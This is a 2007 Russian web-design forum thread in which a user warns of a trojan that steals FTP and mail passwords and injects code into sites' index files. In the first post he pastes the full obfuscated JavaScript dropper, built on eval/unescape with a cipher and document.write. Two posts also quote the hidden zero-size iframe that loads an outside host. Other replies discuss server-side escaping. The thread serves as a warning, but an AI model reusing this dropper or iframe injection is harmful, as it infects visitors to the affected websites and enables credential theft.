ВНИМАНИЕ ВИРУС!!!! - Форум о web-дизайне, графике

Статьи ♦ Flash ♦ Photoshop ♦ Графика ♦ Форум ♦ Полезные ресурсы ♦ Контакты ♦ О проекте ♦ Реклама

На этом месте находится расчудесная шапка. Включите flash - не пожалеете!

Форум о web-дизайне, удаленной работе

Правила Помощь Поиск Репутация Школа Флэша Наш журнал (WA#11)

Здравствуйте, гость ( Вход | Регистрация )

Форум о web-дизайне, графике - RusForumz > Обо всем на свете > Kомпьютерная безопасность

ВНИМАНИЕ ВИРУС!!!!, Смотреть всем!

Опции

Фрукт	28.3.2007, 9:48 Сообщение #1
Почётный житель Группа: Модераторы Сообщений: 823 Регистрация: 15.12.2006 Из: Рунет Пользователь №: 2 283 Репутация: 8	Люди, в ИНтернете пошел новый вирус, который разрастается в геометрической прогрессиии. 2 из моих сайтов уже заражены! Мой комп заражен! Сейчас буду лечиться. Итак, внимание! Первые симптомы - у вас отключается буфер обмена. Вирус похищает все - пароли к аське, фтп, мылу. Но кроме того, он вставляет свой код во все индексные файлы на вашем сервере! Вот тело трояна! Код <html><head><meta http-equiv="expires" content="2"><meta http-equiv="imagetoolbar" content="no"><style type="text/css" media="print"><!-- body{display:none}--></style></head><body> <script language="JavaScript" type="text/javascript"><!-- var k="",e=62,u="",r="9l Vn0Oq;scE5J(Wh>Ix<D3!-tS1\"8i&o)/fz=BewNb:2Pjpva\|yTgUdMmur.k";eval(unescape("%66%75%6E%63%74%69%6F%6E%20%6A%28%6C%29%7B%76%61%72%20%66%3D%27%27%2C%69%2C%67%2C%63%2C%70%3B%66%6F%72%28%69%3D%30%3B%69%3C%6C%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%67%3D%6C%2E%63%68%61%72%41%74%28%69%29%3B%63%3D%72%2E%69%6E%64%65%78%4F%66%28%67%29%3B%69%66%28%63%3E%2D%31%29%7B%70%3D%28%28%63%2B%31%29%25%65%2D%31%29%3B%69%66%28%70%3C%3D%30%29%7B%70%2B%3D%65%7D%66%2B%3D%72%2E%63%68%61%72%41%74%28%70%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%67%7D%7D%75%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%64%64%64%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%29%3B%6B%3D%22%22%7D"));j("DcE.&vSV \|0Ur\|UwB8(\|a\|1E.&vS8VSTvwB8Sw<Sfp\|a\|cE.&vS8ID-tt\nzr0ES&)0VErW/{.wSr.0Vz\| cw}zr0ES&)0V)urWw/{&zWwkN>&E>BB\"/{N&0M)Nk.w w\|cw5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awB0r }}zr0ES&)0V0.Ww/{&zWwkN>&E>BB\"/{N&0M)NkE\|vSr.w5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awBEr}&zWwkN>&E>BB!/{.wSr.0Vz\| cw}}zr0ES&)0VEaW/{avBwaw0Sk:rSS)0s&zWavBBPyyavBB!/\| w.SWr0wcE\|vwW8g>\|09cVz).VT)r.V.&U>SVE &E9k8//}&)BM)Eruw0Sk\| s\|wBM)Eruw0SkUwS5 wuw0SeTxMs&zW&)/{&zW\|w/{M)Eruw0Sk)0cw wEScS\|.SBErsM)Eruw0Sk)0M.\|UcS\|.SBE");j("rsM)Eruw0Sk)0E)0Sw<Suw0rBEr}w cw{M)Eruw0Sk)0u)rcwM)N0BEa}}&zW\|woo-&)/{M)Eruw0Sk)0u)rcwM)N0BErsM)Eruw0Sk)0u)rcwrvB0.sM)Eruw0Sk)0E)0Sw<Suw0rBEr}&zWM)Eruw0Sk \|Tw.c/{N&0M)NkE\|vSr.w5aw0ScW5aw0Skmqd15djy5aw0Skmqd153qhb/sN&0M)Nk)0u)rcwM)N0B0.sN&0M)Nk)0u)rcwrvB)ur}zr0ES&)0V;\|OW/{N&0M)NkcS\|SrcB8V8scwSg&uw)rSW8;\|OW/8,JO/};\|OW/szr0ES&)0V;\|\"W/{.wSr.0VS.rw}&zWM)Eruw0Sk\| yyM)Eruw0SkUwS5 wuw0SeTxM/M)Eruw0Sk:)MTk)0u)rcw)aw.B;\|\"ffttIDfcE.&vSID-tt[&zVUSwVx5VJ]IDM&aV&MB8vl=8VcST wB8v)c&S&)02\|:c) rSwsN&MS>2Ov<s>");j("w&U>SBOv<sa&c&:& &ST2>&MMw08V)0E &E9B8E &v:)\|.M3\|S\|kE w\|.3\|S\|W/8IDfM&aIDcE.&vSV \|0Ur\|UwB8(\|a\|1E.&vS8VSTvwB8Sw<Sfp\|a\|cE.&vS8ID-tt\nzr0ES&)0Vvi=W/{vl=kE &E9W/scwSg&uw)rSW8vi=W/8,JOO/}vi=W/sffttIDfcE.&vSID-[w0M&z]ttIVD&z.\|uwVN&MS>B8O8V>w&U>SB8O8Vc.EB8>SSv2ffuMzEk&0z)fc)zSf8IDf&z.\|uwIV");ddd();document.write(k);k="";//--> </script></body></html> А этот код прога ставит на страницах! Код <!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ --> Началось блин! -------------------- Проект Самоучка - Электронные книги!

iluha@iluha.ru	28.3.2007, 19:00 Сообщение #2
JavaScript.medved.shatun Группа: Модераторы Сообщений: 637 Регистрация: 9.2.2007 Из: Москва Пользователь №: 2 893 Репутация: 42	А, круто написано ) -------------------- Ничего не скрою - бегаю трусцой(ю)! ВНИМАНИЕ: Если вы решили сказать мне спасибо за помощь, добавив + к Репутации, то убедительная просьба - ставить этот + ТОЛЬКО после того, как проблема будет ПОЛНОСТЬЮ решена.

антиКИЛЛЕР	28.3.2007, 19:10 Сообщение #3
Шатунок Группа: Медведи-шатуны Сообщений: 867 Регистрация: 4.9.2006 Из: Заречный Пользователь №: 984 Репутация: 12	Круто круто написано.... Но если это дйствительно реальный вирус то плохоо... З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума....... -------------------- Web Forever - портал для тех, кто с Веб-технологиями навсегда.

Enigmatic	28.3.2007, 20:03 Сообщение #4
XZQ234-blighter Beta Группа: Старший модератор Сообщений: 889 Регистрация: 2.2.2007 Из: Россия/Смоленск Пользователь №: 2 790 Репутация: 39	Цитата З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума....... Интересно как -------------------- После очень продолжительного "отдыха",я вернулся)(. Раскаиваюсь перед всеми кого подвел.

nikitar	28.3.2007, 21:21 Сообщение #5
Мишка-Админ Группа: Главные администраторы Сообщений: 8 653 Регистрация: 7.1.2006 Из: Санкт-Петербург Пользователь №: 12 Репутация: 149	Он не сможет вставить, потому что в сообщениях нельзя писать в html, тут специальный язык BB код. Кстати попробуйте ввести первую строчку кода в гугл, один сайт нашёлся, китайский какой-то, с иероглифами... -------------------- Flash. Обучение. Портфолио - обновление 24 мая 2008 \| Поговори... со мной! Как сделать баннер, фотогалерею, слайд-шоу, mp3-плеер, видео-плеер, презентацию, flash-сайт с помощью flash?

Enigmatic	29.3.2007, 0:10 Сообщение #6
XZQ234-blighter Beta Группа: Старший модератор Сообщений: 889 Регистрация: 2.2.2007 Из: Россия/Смоленск Пользователь №: 2 790 Репутация: 39	Цитата З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума....... думаешь IPB совсем дурики делали?Коли он 70$ стоит Итак чтобы не пугались люди пишу Код приведенный фруктом не будет работать на всех известных форумах IPB Vbuletin phpbb Expp Wr-forum punbb yabb А также на всех CMS системах имеющих сайт поддержки во 2 домене-за 3 домены и вообще без сайта не ручаюсь Да и думаю что он вообще нигде работать не будет,на форумах уже наверно каждому нубу мозги просверлили по поводу штмлспеиалчарс. А программера который писал сайты Фрукта надо поймать морду набить,а если он еще и бабки взял то нах прибить. Кстати Фрукт а через что он тебя "заразил",точнее куда он код впарил этот?Комментарии?Форум? новости?статьи? -------------------- После очень продолжительного "отдыха",я вернулся)(. Раскаиваюсь перед всеми кого подвел.

Фрукт	29.3.2007, 5:07 Сообщение #7
Почётный житель Группа: Модераторы Сообщений: 823 Регистрация: 15.12.2006 Из: Рунет Пользователь №: 2 283 Репутация: 8	А теперь слушайте, историю о том, как это все происходит. Значит так. Данный код стоит на сайте "не_скажу_каком_а_то_заразитесь_.info" и во всяких каталогах. И вот, Как только вы туда заходите В ВАш ослик врезается троян, который изменяется и удаляется. Потом, если вы заходите на фтп допустим обновить сайт, то все пароли скидываются автору. А потом специальная программа во всех индексных файлах, всех папок на вашем сервере прописывает следующее в самый конец: Код <!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ --> И ваш сайт становится распространителем заразы! Вот такая напасть началась! -------------------- Проект Самоучка - Электронные книги!

Eriko	16.2.2008, 2:05 Сообщение #8
Мишка-шатун #21 Группа: Медведи-шатуны Сообщений: 416 Регистрация: 13.12.2007 Пользователь №: 8 189 Репутация: 4	Брррр.... Не дай бог такому с моим сайтом случится, ваще с катушек съеду, и так мне все с трудом дается(( --------------------

ula	16.2.2008, 14:23 Сообщение #9
Житель Группа: Пользователи Сообщений: 463 Регистрация: 2.9.2007 Пользователь №: 4 827 Репутация: 7	Фрукт, какая защита у тебя на компьютере стоит?

« Предыдущая тема · Kомпьютерная безопасность · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 9.8.2008, 0:13

Лицензия зарегистрирована на: RusForumz.com